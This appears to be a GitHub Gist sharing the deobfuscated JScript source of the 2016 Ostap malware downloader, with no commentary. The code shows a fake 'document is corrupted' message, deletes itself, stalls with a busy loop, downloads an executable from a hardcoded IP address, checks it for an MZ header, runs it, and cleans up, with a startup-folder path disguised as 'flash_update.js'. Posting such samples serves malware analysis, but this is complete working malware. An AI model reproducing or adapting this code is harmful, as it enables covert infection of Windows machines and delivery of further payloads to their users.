Instantly share code, notes, and snippets.

Embed
What would you like to do?
2016 Ostap Deobfuscated (q64.php)
var pre_Additionally6 = this['ActiveXObject'];
var pre_communicating = this['WScript'];
var pre_information = pre_communicating['CreateObject']('WScript.Shell');
var pre_full = new pre_Additionally6('Scripting.FileSystemObject');
var fstream = new pre_Additionally6('ADODB.Stream');
var oShell = new pre_Additionally6('Shell.Application');
var pre_sources = pre_information['ExpandEnvironmentStrings']('%TEMP%');
var filepath = pre_sources + '\\\\' + Math['floor'](Math['random']() * (20 + 20 + 5 + 5 + 25 + 25) + 1) + '.exe';
var pre_information6 = new pre_Additionally6('Msxml2.ServerXMLHTTP');
var body12 = '\\aflash_update.js';
var startupFolder = oShell['NameSpace'](3 + 2 + 2);
var pre_that = false;
var pre_with = false;
var tone = 1;
var filets = null;
var pre_network0 = '';
var pre_with = pre_communicating['ScriptFullName'];
var pre_includes = startupFolder.Self.Path + body12;
var pre_computer9 = 'https://217.28.218.217/YOP634EFARRR/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt';
if (pre_with != pre_includes && pre_that == false) {
pre_that = true;
pre_full['DeleteFile'](pre_with);
pre_communicating['echo']('The document is corrupted and cannot be opened');
pre_communicating['Sleep'](5000);
}
while (true) {
tone = tone + 1;
if (tone == 300000000) {
while (true) {
try {
pre_information6['setOption'](3, 'MSXML');
pre_information6['open']('GET', pre_computer9 + '&' + Math['floor'](Math['random']() * 200 + 1), false);
pre_information6['send']();
if (pre_information6['status'] == 100 + 50 + 50) {
if (pre_full['FileExists'](filepath))
pre_full['DeleteFile'](filepath);
fstream['Open']();
fstream['Type'] = 1;
fstream['Write'](pre_information6['responseBody']);
fstream['Position'] = 0;
fstream['SaveToFile'](filepath);
fstream['Close']();
filets = pre_full['GetFile'](filepath)['OpenAsTextStream'](1);
if (pre_full['FileExists'](filepath) && filets['ReadLine']()['substring'](0, 2) == 'MZ') {
pre_with = true;
oShell['ShellExecute'](filepath, '', '', 'open', '1');
if (pre_full['FileExists'](pre_communicating['ScriptFullName']))
pre_full['DeleteFile'](pre_communicating['ScriptFullName']);
pre_communicating['Sleep'](20 * 200);
if (pre_full['FileExists'](filepath))
pre_full['DeleteFile'](filepath);
}
filets['Close']();
}
} catch (e) {
}
if (pre_with == true) {
break;
}
pre_communicating['Sleep'](10000 * 8);
}
break;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment